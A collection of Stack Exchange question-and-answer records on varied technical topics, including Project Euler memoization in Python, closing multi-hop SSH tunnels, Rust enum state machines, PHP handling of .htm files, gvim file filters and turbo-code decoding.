Imagine, for example, that you mistakenly deleted the dpkg program, and that you could thus no longer install Debian packages. dpkg being a Debian package itself, it would seem your system would be done for... Fortunately, you know the format of a package and can therefore download the .deb file of the dpkg package and install it manually (see the TOOLS sidebar). If by some misfortune one or more of the programs ar, tar or gzip/xz/bzip2 have disappeared, you will only need to copy the missing program from another system (since each of these operates in a completely autonomous manner, without dependencies, a simple copy will suffice). | How it is possible that dpkg isn't neccesary for installing deb packages? | debian;dpkg;packaging;ar | null |
_codereview.14442 | For Project Euler problem 14 I wrote code that runs for longer than a minute to give the answer. After I studied about memoization, I wrote this code which runs for nearly 10 seconds on Cpython and nearly 3 seconds on PyPy. Can anyone suggest some optimization tips?import timed={}c=0def main(): global c t=time.time() for x in range(2,1000000): c=0 do(x,x) k=max(d.values()) for a,b in d.items(): if b==k: print(a,b) break print(time.time()-t)def do(num,rnum): global d global c c+=1 try: c+=d[num]-1 d[rnum]=c return except: if num==1: d[rnum]=c return if num%2==0: num=num/2 do(num,rnum) else: num=3*num+1 do(num,rnum)if __name__ == '__main__': main() | Optimizing Code for Project Euler Problem 14 | python;optimization;project euler | I think you're over complicating your solution, my approach would be something along these lines:def recursive_collatz(n): if n in collatz_map: return collatz_map[n] if n % 2 == 0: x = 1 + recursive_collatz(int(n/2)) else: x = 1 + recursive_collatz(int(3*n+1)) collatz_map[n] = x return xBasically define a memoization map (collatz_map), initialized to {1:1}, and use it to save each calculated value, if it's been seen before, simply return.Then you just have to iterate from 1 to 1000000 and store two values, the largest Collatz value you've seen so far, and the number that gave you that value.Something like:largest_so_far = 1highest = 0for i in range(1,1000000): temp = recursive_collatz(i) if temp > largest_so_far: highest = i largest_so_far = tempUsing this approach I got:Problem 14's answer is: 837799.Took 1.70620799065 seconds to calculate. |
_unix.198270 | I want to tunnel VNC traffic to host2, which is only accessible from host1, whereas host1 is publicly accessible.I setup a multi-hop SSH tunnel as described in this question, using:ssh -L 5901:localhost:6000 host1 ssh -L 6000:localhost:5901 -N host2This indeed works perfectly and does the job. However, I don't know how to correctly close the nested tunnel. I tried Ctrl+c but this seems to kill the first ssh instance to host1. But, the second ssh tunnel between host1 and host2 remains open, which is highly undesirable as any one can actually forward traffic through it.Also, with -N option, I don't get an actual tty on host2, so I can't simply exit from there.Without, -N, I still don't get a tty, instead I get the following error:Pseudo-terminal will not be allocated because stdin is not a terminal.Warning: no access to tty (Bad file descriptor).Thus no job control in this shell.term: Undefined variable.I am starting the connection from MacOS X, and both host1 and host2 are running RHEL 6. | Correctly closing multiple hop SSH tunnel | ssh;rhel;ssh tunneling | You're on the right track with tty, and the -t option gives you just that. However, unless you are actually aiming to get a tty session for interacting, leave this option off of the last ssh command in your chain. In your case you just need it on the first connection:ssh -L 5901:localhost:6000 host1 -t ssh -L 6000:localhost:5901 -N host2Now when you use Ctrl-C, the tunnel will between all hosts. |
_codereview.146671 | I have a small project to help me analyze query latency from PostgreSQL statement logging.It's my first time writing anything real in Rust and I think it could be improved in several ways. My question here is about this code from scanner.rs:use std::hash::{Hash, SipHasher, Hasher};use regex::Regex;use std::collections::HashMap;use std::string::String;use std;use csv::Writer;pub enum CrunchState { Scanning(HashMap<i32,String>, Writer<std::io::Stdout>), CurrentQuery(Vec<String>, i32, HashMap<i32,String>, Writer<std::io::Stdout>)}enum MatchResult { Ignore, QueryStart(i32, String), Duration(i32, String)}lazy_static! { static ref REGLS: Regex = Regex::new(r^2016).unwrap(); static ref REPID: Regex = Regex::new(r\d{2,3}\((\d+)\):).unwrap(); static ref REDURATION: Regex = Regex::new(rduration: ([0-9.]+) ms).unwrap(); static ref RESTATEMENT: Regex = Regex::new(r(?:execute.*|statement):(.*)).unwrap();}pub fn init_state() -> CrunchState { let csv_writer: Writer<std::io::Stdout> = Writer::from_writer(std::io::stdout()); CrunchState::Scanning(HashMap::new(), csv_writer)}pub fn process_line(line:String, state:CrunchState) -> CrunchState { match state { CrunchState::Scanning(mut pid_to_query, mut csv_writer) => { match analyze_line(line) { MatchResult::Ignore => CrunchState::Scanning(pid_to_query, csv_writer), MatchResult::QueryStart(pid, query_begin) => { let query_parts = vec![query_begin]; CrunchState::CurrentQuery(query_parts, pid, pid_to_query, csv_writer) }, MatchResult::Duration(pid, duration) => { match pid_to_query.remove(&pid) { Some(full_query) => { let mut hasher = SipHasher::new(); full_query.hash(&mut hasher); let qhash = hasher.finish(); let result = csv_writer.encode((pid, duration, qhash, &full_query)); assert!(result.is_ok()); }, None => { // dangling duration } }; CrunchState::Scanning(pid_to_query, csv_writer) } } }, CrunchState::CurrentQuery(mut query_parts, pid, mut pid_to_query, csv_writer) => { if !REGLS.is_match(&line) { query_parts.push(line); CrunchState::CurrentQuery(query_parts, pid, pid_to_query, csv_writer) } else { let full_query = query_parts.iter().fold(.to_string(), |acc, s| acc + s); pid_to_query.insert(pid, full_query); process_line(line, CrunchState::Scanning(pid_to_query, csv_writer)) } } }}fn analyze_line(line:String) -> MatchResult { if REGLS.is_match(&line) { match REPID.captures_iter(&line).nth(0) { Some(cap) => { let pid: &str = cap.at(1).unwrap(); if REDURATION.is_match(&line) { let duration: &str = REDURATION.captures_iter(&line).nth(0).unwrap().at(1).unwrap(); MatchResult::Duration(pid.parse::<i32>().unwrap(), duration.to_string()) } else if RESTATEMENT.is_match(&line) { let statement: &str = RESTATEMENT.captures_iter(&line).nth(0).unwrap().at(1).unwrap(); MatchResult::QueryStart(pid.parse::<i32>().unwrap(), statement.to_string()) } else { MatchResult::Ignore } }, None => { MatchResult::Ignore } } } else { MatchResult::Ignore }}For reference Cargo.toml:[package]name = pg_crunchversion = 0.1.0authors = [Joshua Barney <[email protected]>][dependencies]regex = 0.1.80lazy_static = 0.2.1csv = 0.14.7Since you can put data into enums, I figured that would be a great way of building a little state machine.It runs and works correctly, but I'm worried about returning a new CrunchState enum for every call to process_line, especially when most lines should result in CrunchState::Ignore and not alter the state. What can I do better than this? | Enum as state for log parsing | enum;rust | The compiler warnings tell me that SipHasher has been deprecated; use DefaultHasher instead.Check out rustfmt. The code has issues with missing spaces after : and ,.Use lines on stdin instead of reimplementing it.main.rsextern crate pg_crunch;use std::io;use std::io::prelude::*;use pg_crunch::scanner::CrunchState;fn main() { let mut state = CrunchState::new(); let stdin = io::stdin(); for line in stdin.lock().lines() { match line { Ok(line) => state = state.process_line(line), Err(error) => println!(error: {}, error), } }}scanner.rsDon't use String; it's already imported. I'd probably prefer to import specific modules or types instead of referring to std.You can create methods on enums just like on structs. new and process_line really feel like methods to me.Accept a &str instead of a String unless you make use of the allocation. analyze_line is a good example.Create a tiny helper method for getting the hash.Consider glob-importing your enum into methods that deal with them heavily.Use if let when there's only one interesting match arm.Use collect to combine multiple strings from an iterator.Avoid Hungarian notation (where you encode the type of something into the name of the variable). The regexen don't need to be prefixed with RE.Don't provide explicit types unless you are required. : Writer<std::io::Stdout> is a good example.There's no need for the turbofish when the type is constrained by the struct you are putting the value in.Instead of assert!, call expect on the Result. This prints the error message and lets you add a bit more context.Try to avoid doing multiple regex calls for the same input. For example, calling is_match is redundant if you are also going to call captures_iter. You should be able to tell if it matched by the result of captures_iter.use std::hash::{Hash, Hasher};use std::collections::hash_map::DefaultHasher;use std::collections::HashMap;use std::io::{self, Stdout};use regex::Regex;use csv::Writer;pub enum CrunchState { Scanning(HashMap<i32, String>, Writer<Stdout>), CurrentQuery(Vec<String>, i32, HashMap<i32, String>, Writer<Stdout>),}fn one_shot_hash(full_query: &str) -> u64 { let mut hasher = DefaultHasher::new(); full_query.hash(&mut hasher); hasher.finish()}impl CrunchState { pub fn new() -> CrunchState { let csv_writer = Writer::from_writer(io::stdout()); CrunchState::Scanning(HashMap::new(), csv_writer) } pub fn process_line(self, line: String) -> CrunchState { use self::CrunchState::*; use self::MatchResult::*; match self { Scanning(mut pid_to_query, mut csv_writer) => { match analyze_line(&line) { Ignore => Scanning(pid_to_query, csv_writer), QueryStart(pid, query_begin) => { let query_parts = vec![query_begin]; CurrentQuery(query_parts, pid, pid_to_query, csv_writer) } Duration(pid, duration) => { if let Some(full_query) = pid_to_query.remove(&pid) { let query_hash = one_shot_hash(&full_query); let result = csv_writer.encode((pid, duration, query_hash, &full_query)); result.expect(Unable to write result); } Scanning(pid_to_query, csv_writer) } } } CurrentQuery(mut query_parts, pid, mut pid_to_query, csv_writer) => { if !GLS.is_match(&line) { query_parts.push(line); CurrentQuery(query_parts, pid, pid_to_query, csv_writer) } else { let full_query = query_parts.into_iter().collect(); pid_to_query.insert(pid, full_query); Scanning(pid_to_query, csv_writer).process_line(line) } } } }}lazy_static! { static ref GLS: Regex = Regex::new(r^2016).unwrap(); static ref PID: Regex = Regex::new(r\d{2,3}\((\d+)\):).unwrap(); static ref DURATION: Regex = Regex::new(rduration: ([0-9.]+) ms).unwrap(); static ref STATEMENT: Regex = Regex::new(r(?:execute.*|statement):(.*)).unwrap();}enum MatchResult { Ignore, QueryStart(i32, String), Duration(i32, String),}fn analyze_line(line: &str) -> MatchResult { use self::MatchResult::*; if GLS.is_match(&line) { match PID.captures_iter(&line).nth(0) { Some(cap) => { let pid = cap.at(1).unwrap(); if DURATION.is_match(&line) { let duration = DURATION.captures_iter(&line).nth(0).unwrap().at(1).unwrap(); Duration(pid.parse().unwrap(), duration.to_string()) } else if STATEMENT.is_match(&line) { let statement = STATEMENT.captures_iter(&line).nth(0).unwrap().at(1).unwrap(); QueryStart(pid.parse().unwrap(), statement.to_string()) } else { Ignore } } None => Ignore, } } else { Ignore }}Am I correct in thinking that creating a new enum for every call to analyze_line is not something to worry about?It is not something that I would worry about, no. The biggest enum is a few bytes, but not many:Veci32HashMapWriterVec and HashMap are mostly on the heap and only have a few bytes for pointers and the like. |
_webapps.87840 | I googled, but can't find a definitive answer.I have a 1k+ reputation as an eBay buyer.Now I want to try to get back some of the cash that I have sent by selling.If I do, will prospective buyers looking at my first sales listing see a reputation of 1k+ or zer0? | eBay - are buyer and seller reputation the same? | ebay | Yes, you have a single reputation score. So, your sales listing will show a 1k+ reputation score.HOWEVER, if someone clicks on your reputation score they can see the full breakdown:Feedback as a seller (under which it will state 0 Feedback received)Feedback as a buyerAll FeedbackFeedback left for othersAs well as the positive, neutral and negative feedback over the last 1, 6 and 12 months. |
_webmaster.68626 | I know this question has been already asked here. I am trying to use a script in my localhost. The script contains .htm files and an .htaccess file with the following code to parse those .htm files as PHP.AddHandler application/x-httpd-php5 .htm .php .htmlNow this is not working at all and i get a blank web page whenever i run it from my localhost. i.e localhost/paystill_enterprise and it give me blank webpage.Now i have tried every solution i could find on internet like editing httpd.conf file etc. Here are some of the solutions i have tried.1- I have tried editing httdp.conf and have added the following code one by one <IfModule mime_module> AddType application/x-httpd-php .php AddType application/x-httpd-php .html AddType application/x-httpd-php .htm AddType application/x-httpd-php .txt </IfModule> <FilesMatch \.html$> ForceType application/x-httpd-php </FilesMatch> <FilesMatch \.htm$> ForceType application/x-httpd-php </FilesMatch>2- Tried adding these lines of code one by one in my .htaccess file AddType application/x-httpd-php .html .htm AddType application/x-httpd-php5 .html .htm RemoveHandler .html .htm AddType application/x-httpd-php .php .htm .htmlNo matter what i use, always get a blank page for localhost/paystill_enterprise.Note:Sometimes it also happens that when i type the address localhost/paystill_enterprise, the browsers asks me to save the file i.e the browser tries to download it.Any suggestions? | Wamp Server Not Parsing htm Files As PHP | apache;apache2;wampserver;wamp | null |
_unix.239351 | I am trying to use lisp in linux but I can not get the listener to work.Using Eclipse's menu, in help -> install new software, I installed the dandelion plugin but every time I try to run lisp code, like (+ 1 2), something simple, I get the following errors:Error in background evaluationjava.net.ConnectException: Connection refusedError initialising connectionjava.net.ConnectException: Connection refusedStarting eval server failedCannot run program /home/michael/.eclipse/org.eclipse.platform_3.8_155965261/plugins/de.defmacro.dandelion.env.clisp.linux.x86_2.49.2/binary/environment_clisp_2.49.2: error=13, Permission deniedI have tried running the commandsudo chmod + /home/michael/.eclipse/org.eclipse.platform_3.8_155965261/plugins/de.defmacro.dandelion.env.clisp.linux.x86_2.49.2/binary/environment_clisp_2.49.2Yet I see no output, the terminal just goes to the next new line. I am running a 64bit ubuntu version 14. I am pretty new to all this but I would like to use linux as my main OS as it is quite convenient for school. If anyone has ideas please let me know!I went in and manually edited the files permission to allow anyone to read and write. I now only get the errors.Error in background evaluationjava.net.ConnectException: Connection refusedError initialising connectionjava.net.ConnectException: Connection refusedIdeas? | Dandelion List Listener Fails | linux;chmod;eclipse | null |
_codereview.15617 | I have the following code: public string GetRefStat(string pk) { return RefStat[pk.Substring(2, 2)]; } private readonly Dictionary<String, int> RefStat = new Dictionary<string, int> { {00, REF.MenuType, } // Menu {01, REF.ReferenceStatus,} // Article {02, REF.ReferenceStatus,} // Favorites List {03, REF.ReferenceStatus,} // Content Block {06, REF.ReferenceStatus } // Topic };GetRefStat and the dictionary are always used together. Is there a way I could simplify and combine these? I was wondering if I could put the information in a static class and then have a get method that returned the information I needed. | Simplifying dictionary of constant values | c# | null |
_codereview.86168 | I have a code snippet which I wish to improve to increase my program's FPS, but as a beginner in JavaScript, I do not know how. I know the problem, which is the fact my counter mechanism used to delay attacks is causing lag. I just don't know how to change my code to minimize this lag. I am looking for helpful criticism and code examples to improve my code.I am going to provide the entire function my code snippet is in so you can relate to it. (I have been told this will help debuggers elsewhere.)The function to optimize:var updateMobs = function() { // Called in a loop at 30 FPS for (var b = 0; b < mobsBlue.length; b++) { // The length of both lists is at max 60 BM = mobsBlue[b] BM.x = BM.x - BM.object.speed doCollision(BM, redBase, BM) doCollision(BM, debugPlayer, BM) if (BM.x < 0){ mobsBlue.splice(br, 1) } BM.Draw(ctx, false) } for (var r = 0; r < mobsRed.length; r++) { RM = mobsRed[r] RM.x = RM.x + RM.object.speed doCollision(RM, blueBase, RM) doCollision(RM, debugPlayer, RM) if (RM.x > 1350){ mobsRed.splice(r, 1) } RM.Draw(ctx, false) for (var br = 0; br < mobsBlue.length; br++) { BM = mobsBlue[br] if (doCollision(RM, BM, collisionNull) == true) { // ATTACKING BM.x = BM.x + BM.object.speed RM.x = RM.x - RM.object.speed if (BM.object.attackTime == 500 || RM.object.attackTime == 500) { if (BM.object.armourType == 'light') { BM.object.health = BM.object.health - RM.object.lightDamage } if (BM.object.armourType == 'heavy') { BM.object.health = BM.object.health - RM.object.heavyDamage } if (RM.object.armourType == 'light') { RM.object.health = RM.object.health - BM.object.lightDamage } if (RM.object.armourType == 'heavy') { RM.object.health = RM.object.health - BM.object.heavyDamage } if (BM.object.health <= 0) { mobsBlue.splice(br, 1) } if (RM.object.health <= 0) { mobsRed.splice(r, 1) } BM.object.attackTime = 0 RM.object.attackTime = 0 } BM.object.attackTime = BM.object.attackTime + 1 RM.object.attackTime = RM.object.attackTime + 1 } BM.Draw(ctx, false) RM.Draw(ctx, false) } }}The doCollision and moveOutside functions:var doCollision = function(rect1, rect2, objectToMove) { if (rect1.x + rect1.w > rect2.x && rect1.x < rect2.x + rect2.w && rect1.y + rect1.h > rect2.y && rect1.y < rect2.y + rect2.h) { if (objectToMove === rect1) { moveOutside(objectToMove, rect2); return true } else if (objectToMove === rect2) { moveOutside(objectToMove, rect1); return true } return true };};var moveOutside = function(rectToMove, otherRect) { // Determine if the overlap is due more to x or to y, // then perform the appropriate move var moveOverOtherX = rectToMove.x + rectToMove.w - otherRect.x; var otherOverMoveX = otherRect.x + otherRect.w - rectToMove.x; var moveOverOtherY = rectToMove.y + rectToMove.h - otherRect.y; var otherOverMoveY = otherRect.y + otherRect.h - rectToMove.y; var minOver = Math.min(moveOverOtherX, otherOverMoveX, moveOverOtherY, otherOverMoveY); if (minOver == moveOverOtherX) { rectToMove.x = otherRect.x - rectToMove.w; } else if (minOver == otherOverMoveX) { rectToMove.x = otherRect.x + otherRect.w; } else if (minOver == moveOverOtherY) { rectToMove.y = otherRect.y - rectToMove.h; } else { rectToMove.y = otherRect.y + otherRect.h; };};I am looking for more answers. | FPS efficiency for 'attack counter' | javascript;beginner;performance;collision;battle simulation | null |
_unix.361241 | I have a Dell U2417HA monitor that came with my Dell Desktop. The monitor has an audio output and from what I've read the audio is supposed to come through the HDMI cable and I should be able to plug my earphones directly in the monitor's output. The problem is that this doesn't happen, probably because I installed Linux Mint 18 on the desktop.Unfortunately, the Dell website only lists windows drivers for this monitor, and I haven't been able to find this topic on the internet. Any ideas?PS.: I have already switched to HDMI output on the sound configurations menu, and tried every possible option in pavucontrol.I have the default 4.4 kernel installed. I don't know if upgrading the kernel to 4.10 might solve the problem, but I'd like to avoid doing this unless there really isn't another solution.EDITI just found out that I'm actually using a DP connection for the monitors, since I don't have an HDMI port in my CPU (I didn't install this computer). But according this answer DP also carries audio. So can I still get sound through my monitor?EDIT2Output of xrandr:Screen 0: minimum 8 x 8, current 3840 x 1080, maximum 16384 x 16384DP-0 disconnected (normal left inverted right x axis y axis)DP-1 disconnected (normal left inverted right x axis y axis)DP-2 connected primary 1920x1080+0+0 (normal left inverted right x axis y axis) 527mm x 296mm 1920x1080 60.00*+ 60.00 59.94 50.00 23.97 60.05 60.00 50.04 1600x1200 60.00 1280x1024 75.02 60.02 1280x720 60.00 59.94 50.00 1152x864 75.00 1024x768 75.03 60.00 800x600 75.00 60.32 720x576 50.00 720x480 59.94 640x480 75.00 59.94 59.93 DP-3 connected 1920x1080+1920+0 (normal left inverted right x axis y axis) 527mm x 296mm 1920x1080 60.00*+ 60.00 59.94 50.00 23.97 60.05 60.00 50.04 1600x1200 60.00 1280x1024 75.02 60.02 1280x720 60.00 59.94 50.00 1152x864 75.00 1024x768 75.03 60.00 800x600 75.00 60.32 720x576 50.00 720x480 59.94 640x480 75.00 59.94 59.93 Output from aplay -l**** List of PLAYBACK Hardware Devices ****card 0: PCH [HDA Intel PCH], device 0: ALC3220 Analog [ALC3220 Analog] Subdevices: 1/1 Subdevice #0: subdevice #0card 1: NVidia [HDA NVidia], device 3: HDMI 0 [HDMI 0] Subdevices: 1/1 Subdevice #0: subdevice #0card 1: NVidia [HDA NVidia], device 7: HDMI 1 [HDMI 1] Subdevices: 1/1 Subdevice #0: subdevice #0EDIT3Contents from /proc/asound/card0/codec#0 and from /proc/asound/card1/codec#0. The latter one is probably the one that matters (NVIDIA). | Sound output from Dell U2417HA monitor doesn't work on Linux | linux mint;drivers;audio | null |
_codereview.173049 | I'd like some feedback on the readability, style, and potential problems or issues. In particular I'm not too happy with how I handle ratelimits.import jsonimport requestsimport pandas as pdimport matplotlib.pyplot as pltfrom dateutil.relativedelta import relativedeltafrom datetime import datefrom flatten_json import flattenfrom tqdm import tnrange as trangefrom time import sleepclass CrimsonHexagonClient(object): Interacts with the Crimson Hexagon API to retrieve post data (twitter ids etc.) from a configured monitor. Docs: https://apidocs.crimsonhexagon.com/v1.0/reference Args: username (str): Username on website. password (str): Password on website. monitor_id (str): id of crimson monitor. def __init__(self, username, password, monitor_id): self.username = username self.password = password self.monitor_id = monitor_id self.base = 'https://api.crimsonhexagon.com/api/monitor' self.session = requests.Session() self.ratelimit_refresh = 60 self._auth() def _auth(self): Authenticates a user using their username and password through the authenticate endpoint. url = 'https://forsight.crimsonhexagon.com/api/authenticate?' payload = { 'username': self.username, 'password': self.password } r = self.session.get(url, params=payload) j_result = r.json() self.auth_token = j_result[auth] print('-- Authenticated --') return def make_endpoint(self, endpoint): return '{}/{}?'.format(self.base, endpoint) def get_data_from_endpoint(self, from_, to_, endpoint): Hits the designated endpoint (volume/posts) for a specified time period. The ratelimit is burned through ASAP and then backed off for one minute. endpoint = self.make_endpoint(endpoint) from_, to_ = str(from_), str(to_) payload = { 'auth': self.auth_token, 'id': self.monitor_id, 'start': from_, 'end': to_, 'extendLimit': 'true', 'fullContents': 'true' } r = self.session.get(endpoint, params=payload) self.last_response = r ratelimit_remaining = r.headers['X-RateLimit-Remaining'] # If the header is empty or 0 then wait for a ratelimit refresh. if (not ratelimit_remaining) or (float(ratelimit_remaining) < 1): print('Waiting for ratelimit refresh...') sleep(self.ratelimit_refresh) return r def get_dates_from_timespan(self, r_volume, max_documents=10000): Divides the time period into chunks of less than 10k where possible. # If the count is less than max, just return the original time span. if r_volume.json()['numberOfDocuments'] <= max_documents: l_dates = [[pd.to_datetime(r_volume.json()['startDate']).date(), pd.to_datetime(r_volume.json()['endDate']).date()]] return l_dates # Convert json to df for easier subsetting & to calculate cumulative sum. df = pd.DataFrame(r_volume.json()['volume']) df['startDate'] = pd.to_datetime(df['startDate']) df['endDate'] = pd.to_datetime(df['endDate']) l_dates = [] while True: df['cumulative_sum'] = df['numberOfDocuments'].cumsum() # Find the span whose cumulative sum is below the threshold. df_below = df[df['cumulative_sum'] <= max_documents] # If there are 0 rows under threshold. if (df_below.empty): # If there are still rows left, use the first row. if len(df) > 0: # This entry will have over 10k, but we can't go more # granular than one day. df_below = df.iloc[0:1] else: break # Take the first row's start date and last row's end date. from_ = df_below['startDate'].iloc[0].date() to_ = df_below['endDate'].iloc[-1].date() l_dates.append([from_, to_]) # Reassign df to remaining portion. df = df[df['startDate'] >= to_] return l_dates def plot_volume(self, r_volume): Plots a time-series chart with two axes to show the daily and cumulative document count. # Convert r to df, fix datetime, add cumulative sum. df_volume = pd.DataFrame(r_volume.json()['volume']) df_volume['startDate'] = pd.to_datetime(df_volume['startDate']) df_volume['endDate'] = pd.to_datetime(df_volume['endDate']) df_volume['cumulative_sum'] = df_volume['numberOfDocuments'].cumsum() fig, ax1 = plt.subplots() ax2 = ax1.twinx() df_volume['numberOfDocuments'].plot(ax=ax1, style='b-') df_volume['cumulative_sum'].plot(ax=ax2, style='r-') ax1.set_ylabel('Number of Documents') ax2.set_ylabel('Cumulative Sum') h1, l1 = ax1.get_legend_handles_labels() h2, l2 = ax2.get_legend_handles_labels() ax1.legend(h1+h2, l1+l2, loc=2) plt.show() return def make_data_pipeline(self, from_, to_): Combines the functionsin this class to make a robust pipeline, that loops through each day in a time period. Data is returned as a dataframe. # Get the volume over time data. r_volume = self.get_data_from_endpoint(from_, to_, 'volume') print('There are approximately {} documents.'.format(r_volume.json()['numberOfDocuments'])) self.plot_volume(r_volume) # Carve up time into buckets of volume <10k. l_dates = self.get_dates_from_timespan(r_volume) data = [] for i in trange(len(l_dates), leave=False): from_, to_ = l_dates[i] # Pull posts. r_posts = self.get_data_from_endpoint(from_, to_, 'posts') if r_posts.ok and (r_posts.json()['status'] != 'error'): j_result = json.loads(r_posts.content.decode('utf8')) data.extend(j_result['posts']) l_flat= [flatten(d) for d in data] df = pd.DataFrame(l_flat) return dfif __name__ == __main__: # Credentials. username = 'xxxxx' password = 'xxxxx' # Monitor id - taken from URL on website. monitor_id = '123' # Instantiate client. crimson_api = CrimsonHexagonClient(username, password, monitor_id) from_ = date(2017, 1, 1) to_ = date(2017, 6, 30) # Combine class functions into a typical workflow. df = crimson_api.make_data_pipeline(from_, to_) | Python API for Crimson Hexagon | python;api;pandas | Readability & StyleImportsRemove the modules that you're not using (dateutil).Imports should be grouped in the following order:standard library importsrelated third party importslocal application/library specific importsCode layoutYou should surround top-level function and class definitions with two blank lines. Whitespace in Expressions and StatementsAvoid extraneous whitespaces before/after any operator (in your case, =) and between two lines of code.CommentsYou have some comments which doesn't add any value to your code. Get rid of them. (E.g: # Credentials., # Instantiate client.)Should you use OOP ?You've created all your code by using a class but you didn't actually make use of it. 80% of your methods are static which makes me think you shouldn't need to use a class . Try to reorganise your code by splitting it into smaller functions and create classes only if you need to communicate state between your methods or you need one of the OOP principles (inheritance, polymorphism etc). PS: As a side note, this is entirely subjective More on the codeYou're not using self.last_response anywhere. Remove it.In _auth and plot_volume methods, the return statement is redundant. Remove it.In make_data_pipeline method, don't create useless variables. Instead, you can directly return pd.DataFrame(l_flat).You don't need parentheses here: if (df_below.empty).You should really add some try/except blocks at least when you're authenticating against the API and let the user know if something went wrong or not. |
_webmaster.104344 | Hi i have been wondering on how to make a live search on my movie website and im trying to do it without a database. So i decided to go with php and xml. These are my code so far. please help me fix this error.this is my errorload(movie.xml); $x=$xmlDoc->getElementsByTagName('movie'); //get the q parameter from URL $q=$_GET[q]; //lookup all links from the xml file if length of q>0 if (strlen($q)>0) { $hint=; for($i=0; $i<($x->length); $i++) { $y=$x->item($i)->getElementsByTagName('title'); $z=$x->item($i)->getElementsByTagName('genre'); if ($y->item(0)->nodeType==1) { //find a link matching the search text if (stristr($y->item(0)->childNodes->item(0)->nodeValue,$q)) { if ($hint==) { $hint= . $y->item(0)->childNodes->item(0)->nodeValue . ; } else { $hint=$hint . . $y->item(0)->childNodes->item(0)->nodeValue . ; } } } } } // Set output to no suggestion if no hint was found // or to the correct values if ($hint==) { $response=no suggestion; } else { $response=$hint; } //output the response echo $response; ?>this is my xml movie file http:// webdam.inria.fr / Jorge / files / movies.xmlThis is my html code. file name: livesearch.htmlThis is my php code: getmovie.php | How to fix xml and php live search | html;php;search;error;xml | null |
_cstheory.33488 | I'm self-studying turbo codes for a graduate course in coding theory. I understood how turbo codes works by directly reading Berrou' paper and some of the following works on this topic. Given that, there is a simple question that i canno't answer with my self...Turbo code relies on the fundamental principle of message passing during iterative decoding, more formally speaking the extrinsic information produced by one decoder is passed as a-priori information to the next (companion) decoder. This is my problematic point: why extrinsic information, that is an a-posteriori computation (given from the Log-likelihood-ratio) should be passed as an a-priori information the next decoder?The LLR can be expressed as:$$L(u_i)=\log\frac{P(u_i=1|\text{observation})}{P(u_i=0|\text{observation})}=\log\frac{p(obs.|u_i=1)}{p(obs.|u_i=0)}+\log\frac{P(u_i=0)}{P(u_i=1)}$$What if the apriori knowledge of the source is known? For example...suppose a indipendent binary source, so that $P(0)=P(1)=1/2$. In this case there is no need to update the apriori knowledge because it is exactly equal to $0$, and extrinsic information is, in general, different from $0$, so the estimate is wrong at each step.Thanks in advance | Turbo codes and message passing | it.information theory;message passing | null |
_unix.16541 | I need to go through all my css and js files and if there is a filename referenced that has any slashes (/) at all then the slash should be removed. What I want is:if any files referenced are named /file.jpg then remove the leading slash leaving just file.jpg. For example, in a CSS file change: @import url(/base.css); to @import url(base.css);if the file referenced is named /files/file.jpg then the leading slashes and folder name should be removed leaving just file.jpg. I started to write it but then couldn't think about how to deal with the slashes.grep -o -h -E '[A-Za-z0-9:./_-]+\.(png|jpg|gif|tif|css)' `find${new_directory} -name '*.css' -or -name '*.js'`Any idea how to do this? I am doing this using a .sh shell script. | Remove slashes/parent paths from filenames inside CSS and Javascript content | shell;text processing;find | null |
_webmaster.65746 | I have a simple funnel situation. The users start at /start/ . Some of them reach the result at /result/ and obviously some don't.So it seems logical to me that:users who went to the start page = user who did see the result page afterwards+ user who did NOT see the result page afterwardsHowever my results areusers who went to the start page << user who did see the result page afterwards + user who did NOT see the result page afterwardsuser who did see the result page afterwards is smaller than users who went to the start page and has about the same pageview ration as the API calls tell me.user who did NOT see the result page afterwards is just 10% smaller than users who went to the start pageThe calls are run via the spreadsheet addin to the API.all three calls share these attributes:Metric: ga:usersno filterare for the last 30 daysSampling: HIGHER_PRECISIONThe segments differ for each callusers::sequence::ga:pagePath=~/start/$users::sequence::ga:pagePath=~/start/$;->>ga:pagePath=~/result/.*users::sequence::ga:pagePath=~/start/$;->>ga:pagePath!~/result/.* | Sum of completed and not completed doesn't add up correctly in the Google Analytics API | google analytics;analytics api;regular expression | null |
_codereview.70040 | Looking at this Typeclassopedia exercise, I typed out foldTree on the following type:data ITree a = Leaf (Int -> a) | Node [ITree a]And my implementation of Functor:instance Functor (ITree) where fmap = iTreeMapiTreeMap :: (a -> b) -> ITree a -> ITree biTreeMap f (Leaf x) = Leaf $ fmap f x iTreeMap f (Node xs) = Node $ map (iTreeMap f) xsPlease critique its signature, correctness and style. | Implementing Functor Instance for `ITree` | haskell;tree | null |
_unix.171054 | By convention, our C++ headers live in .hpp files. When I open a gvim window with a .cpp file (so C++ source), then use the open menus, I get file chooser window which allows me to select files for:C++ Source Files (*.cpp, *.c++)C Header Files (*.h)C Source Files (*.c)All Files (*.*)Clearly, none of those will match just C++ Headers -- whatever the extension is. So, my question is: How do I create a new entry for C++ Header Files (*.hpp, *.h++)?Bonus: How do I add (*) to the All Files option? I guess this will be the same method as above. | C++ header/source files in file chooser | vim;gvim | This can be configured via a buffer-local b:browsefilter variable, which is set in filetype plugins; for C/C++, $VIMRUNTIME/ftplugin/c.vim. To change / override this, just put the following into ~/.vim/after/ftplugin/cpp.vim:let b:browsefilter = C++ Source Files (*.cpp *.c++)\t*.cpp;*.c++\n . \ C Header Files (*.hpp, *.h++)\t*.hpp;*.h++\n . \ C Source Files (*.c)\t*.c\n . \ All Files (*.*)\t*.*\n |
_datascience.11632 | I'm totally new in machine learning. The first confusing concept is subspace. In multi label classification we have to share the subspace. What does one mean by that shared sub spaces? | What is a subspace and what is a shared subspace? | machine learning;classification;statistics;multilabel classification | null |
_unix.186294 | I have an ssh-agent running on my local machine. I connect to a remote machine via SSH, with agent forwarding enabled. On that remote there is an instance of gpg-agent running.I know that recent versions of gpg-agent (2.1+) have the command-line flag --extra-socket which you can use have the agent retrieve not only the keys added to it, but also keys from a forwarded gpg-agent.However, I don't have gpg-agent running on my local machine; I have ssh-agent. Is there a way to have gpg-agent retrieve SSH keys from that forwarded ssh-agent? | How do I combine SSH agent forwarding and gpg-agent? | gpg;ssh agent | null |
_datascience.1090 | It may be unlikely that anyone knows this but I have a specific question about Freebase. Here is the Freebase page from the Ford Taurus automotive model . It has a property called Related Models. Does anyone know how this list of related models was compiled. What is the similarity measure that they use? I don't think it is only about other wikipedia pages that link to or from this page. Alternatively, it may be that this is user generated. Does anyone know for sure? | Freebase Related Models | dataset | null |
